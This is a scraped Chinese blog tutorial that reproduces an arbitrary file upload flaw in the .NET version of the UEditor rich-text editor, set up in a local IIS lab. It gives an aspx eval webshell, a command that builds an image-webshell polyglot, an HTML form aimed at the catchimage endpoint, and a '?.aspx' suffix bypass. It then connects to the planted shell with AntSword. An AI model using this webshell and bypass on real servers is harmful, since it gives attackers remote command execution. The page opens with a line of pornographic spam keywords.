国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Ueditor編輯器任意文件上傳漏洞

這篇具有很好參考價值的文章主要介紹了Ueditor編輯器任意文件上傳漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、漏洞描述

UEditor是一款所見即所得的開源富文本編輯器,具有輕量、可定制、用戶體驗優(yōu)秀等特點,被廣大WEB應(yīng)用程序所使用。本次爆出的高危漏洞屬于.NET版本,其它的版本暫時不受影響。漏洞成因是在抓取遠程數(shù)據(jù)源的時候未對文件后綴名做驗證導(dǎo)致任意文件寫入漏洞,黑客利用此漏洞可以在服務(wù)器上執(zhí)行任意指令,綜合評級高危。

二、影響范圍

該漏洞影響UEditor的.Net版本,其它語言版本暫時未受影響。

三、漏洞原理

漏洞的成因是在獲取圖片資源時僅檢查了Content-Type,導(dǎo)致可以繞過達到任意文件上傳。具體的漏洞分析可參考:https://www.freebuf.com/vuls/181814.html

四、漏洞復(fù)現(xiàn)

1、環(huán)境部署

準(zhǔn)備一臺Windows Server服務(wù)器,我用的是Windows 2008 Server。

沒有安裝.NET Framework 4.0的要先安裝:http://www.microsoft.com/zh-cn/download/details.aspx?id=17718

安裝完 .NET Framework 4.0 后,還需要向 IIS 注冊應(yīng)用程序池,注冊的方法是,使用管理員權(quán)限打開命令提示符(CMD),輸入以下命令:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i

安裝完畢后,在 IIS 管理器刷新就能看到 4.0 的應(yīng)用程序池。

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 下載utf8的.net版本

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

右鍵 網(wǎng)站–添加網(wǎng)站,選擇下載的Ueditor目錄, 選擇版本為 4.0 的應(yīng)用程序池;點擊連接為,設(shè)置特定用戶,該特定用戶為主機上存在的用戶例如administrator

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

此時訪問127.0.0.1:8080已經(jīng)有Ueditor的界面了

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

代碼要求以應(yīng)用程序的形式來運行(可以方便加入庫依賴和組織代碼)。所以需要把 net 目錄轉(zhuǎn)換為應(yīng)用程序;點擊連接為,設(shè)置特定用戶,該特定用戶為主機上存在的用戶例如administrator

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

訪問net/controller.ashx 控制器文件,出現(xiàn)以下界面說明編輯器應(yīng)用程序運行成功,且漏洞存在,到此配置完畢。

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

如果配置過程中訪問頁面顯示權(quán)限不夠的報錯,那么右鍵部署項目的文件夾,選擇屬性,選擇安全,增加Everyone用戶,將該用戶的權(quán)限設(shè)置為完全控制,點擊確定,重新部署即可。

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

2、攻擊流程

訪問http://ip:port/net/controller.ashx 控制器文件。當(dāng)出現(xiàn)下圖的時候表示漏洞存在

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

準(zhǔn)備一個aspx一句話木馬

<% @Page Language="Jscript"%><%eval(Request.Item["w01ke"],"unsafe");%>

制作圖片馬

copy w01ke.jpg /b + shell.aspx /a ueditor.jpg

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

準(zhǔn)備一臺服務(wù)器存放圖片馬或者需要上傳的文件,將做好的ueditor.jpg圖片馬上傳到我們的服務(wù)器,并開啟下載服務(wù)(HTTP)

python -m SimpleHTTPServer 8080

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

制作一個HTML。因為不是上傳漏洞所以enctype 不需要指定為multipart/form-data。

<form action="http://xxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr: <input type="text" name="source[]" /></p >
  <input type="submit" value="Submit" />
</form>

其中http://xx.com 為需要測試的網(wǎng)站地址,action后填寫路徑為實際中遇到的路徑,不要太死板,如果太死板不按網(wǎng)站的實際路徑來就會出現(xiàn)路徑找不到的錯誤

打開我們做好的HTML,shell addr 處填寫服務(wù)器上圖片馬地址,構(gòu)造成以下格式,繞過上傳使其解析為 aspx

http://xxxx/ueditor.jpg?.aspx

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

點擊submit,直接顯示無效URL

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

經(jīng)過排查,發(fā)現(xiàn)不能用Python開啟web的方式,貌似只能用域名的形式(我不確定),我只好把我的圖片馬上傳至云服務(wù)器,然后修改訪問域名即可成功,同時回顯了木馬路徑

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全

使用蟻劍連接:

ueditor漏洞,從0到1學(xué)習(xí)Web安全,編輯器,服務(wù)器,.net,web安全文章來源地址http://www.zghlxwxcb.cn/news/detail-810980.html

五、防御措施

  1. 修改CrawlerHandler.cs 增加對文件擴展名的;
  2. IPS等防御產(chǎn)品可以加入相應(yīng)的特征

到了這里,關(guān)于Ueditor編輯器任意文件上傳漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • UEditor富文本編輯器上傳圖片打不開,提示“后端配置項沒有正常加載,上傳插件不能正常使用”

    UEditor富文本編輯器上傳圖片打不開,提示“后端配置項沒有正常加載,上傳插件不能正常使用”

    1、安裝 npm install?vue-ueditor-wrap 2、下載所需資源 這一步在解決報錯的時候會用到 ?????????? UEditor資源下載鏈接 上面的打不開請從下面鏈接下載項目 ueditor-download: vue項目中集成ueditor的UE資源 3、下載完成后將文件夾放到public文件夾下 4、 配置ueditor.config.js,并且在main.j

    2024年02月13日
    瀏覽(94)
  • 小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    # 知識點: 1 、中間件安全問題 2 、中間件文件上傳解析 3 、 Web 應(yīng)用編輯器上傳 編輯器也就是第三方插件,一般都是文件上傳漏洞 # 詳細點: 1 、檢測層面:前端,后端等 2 、檢測內(nèi)容:文件頭,完整性,二次渲染等 3 、檢測后綴:黑名單,白名單, MIME 檢測等 4 、繞過技

    2024年03月16日
    瀏覽(31)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    先自我介紹一下,小編浙江大學(xué)畢業(yè),去過華為、字節(jié)跳動等大廠,目前阿里P7 深知大多數(shù)程序員,想要提升技能,往往是自己摸索成長,但自己不成體系的自學(xué)效果低效又漫長,而且極易碰到天花板技術(shù)停滯不前! 因此收集整理了一份《2024年最新網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》

    2024年04月24日
    瀏覽(48)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    2、解析漏洞-nginx.conf 配置不當(dāng) 二,Web 應(yīng)用編輯器-Ueditor 文件上傳安全 三,實例 CMS平臺-中間件解析編輯器引用 配套資源下載(百度網(wǎng)盤): 鏈接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4? 提取碼:jgg4 本章節(jié)知識點: 1 、中間件安全問題 2 、中間件文件上傳解析 3 、

    2024年04月15日
    瀏覽(27)
  • AJAX + PHP 編輯器內(nèi)容自動備份草稿保存到本地 (適用ueditor百度編輯器或其它) 內(nèi)容變化后自動觸發(fā)備份txt文件

    AJAX + PHP 編輯器內(nèi)容自動備份草稿保存到本地 (適用ueditor百度編輯器或其它) 內(nèi)容變化后自動觸發(fā)備份txt文件

    百度自帶的自動備份功能enableAutoSave存在問題, 比如第一個文章他自動備份了.等發(fā)表第二個文章時,結(jié)果把第一個文章的內(nèi)容自動填充進去了.關(guān)鍵你還不知情!出現(xiàn)過多次這種情況了. 一, 百度原版的 ,具體使用方法,看這里個文章 Ueditor百度編輯器內(nèi)容自動保存到本地防數(shù)據(jù)丟失

    2024年02月10日
    瀏覽(21)
  • layui 整合UEditor 百度編輯器

    layui 整合UEditor 百度編輯器 第一步:下載百度編輯器并配置好路徑 百度編輯器下載地址:http://fex.baidu.com/ueditor/ 第二步:引入百度編輯器 代碼如下: 第三步:提交表單部分 注意: 提交表單前一定要替換content的內(nèi)容為編輯器內(nèi)容,data.field.content = ue.getContent(); 否則,提交的

    2024年02月13日
    瀏覽(29)
  • UEditor 百度富文本編輯器使用 遇到問題

    UEditor 百度富文本編輯器使用 遇到問題

    小小吐槽 碰到前后不分離項目,富文本使用的UEdtior? 在ueditor.all.js文件中找到這個 callback()函數(shù)? 這里使用根據(jù)圖片的url轉(zhuǎn)成base64 ? 把ueditor.all.js 中 swictch 循環(huán) case \\\'img\\\'注釋掉 ? 所以最后的解決方法是: 1、ueditor.config.js,enableAutoSave的注釋去掉并設(shè)置成false,saveInterval的注釋

    2024年02月15日
    瀏覽(22)
  • 秀米編輯器(xiumi)+百度編輯器(Ueditor) 集成 :解決集成問題,秀米編輯器導(dǎo)出到百度編輯器格式問題,圖片保存到自己的服務(wù)器(阿里云OSS)

    秀米編輯器(xiumi)+百度編輯器(Ueditor) 集成 :解決集成問題,秀米編輯器導(dǎo)出到百度編輯器格式問題,圖片保存到自己的服務(wù)器(阿里云OSS)

    1.集成前提條件: ????????1. 需要集成 百度編輯器 到環(huán)境中 ????????2. https 環(huán)境下才可以導(dǎo)出數(shù)據(jù)到百度編輯器,如果不是https環(huán)境,會出現(xiàn)錯誤 ???????? 然后我們開始講解如何集成: 2.引入資源: //百度編輯器 需要修改的文件(配置與原始的配置不一樣,后面

    2024年02月09日
    瀏覽(86)
  • vue項目百度ueditor編輯器集成135和秀米,主題圖標(biāo)美化

    vue項目百度ueditor編輯器集成135和秀米,主題圖標(biāo)美化

    本文介紹vue項目里引入百度Ueditor富文本編輯器,集成135編輯器和秀米編輯器,使內(nèi)容編輯更加豐富,跳轉(zhuǎn)體驗更加絲滑。再封裝成組件,使用更加快捷。 編輯器主界面 彈框打開135編輯器 彈框打開秀米編輯器 操作說明:ueditor編輯器菜單欄集成135和秀米圖標(biāo),點擊分別彈框打

    2024年02月05日
    瀏覽(26)
  • Ueditor 富文本編輯器 插入 m3u8 和 mp4 視頻(PHP)

    Ueditor 富文本編輯器 插入 m3u8 和 mp4 視頻(PHP)

    當(dāng)前環(huán)境:PHP、Ueditor的版本是1.4.3 新的需求是,需要在Ueditor 富文本編輯器中,插入視頻播放,并且視頻格式有MP4,也有M3U8。 百度編輯器默認的是embed,需要修改下配置。 ueditor.all.js 和 ueditor.config.js 這兩個文件要改一些東西,具體我這里就不展示了,網(wǎng)上有很多文章都有寫

    2024年02月11日
    瀏覽(37)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包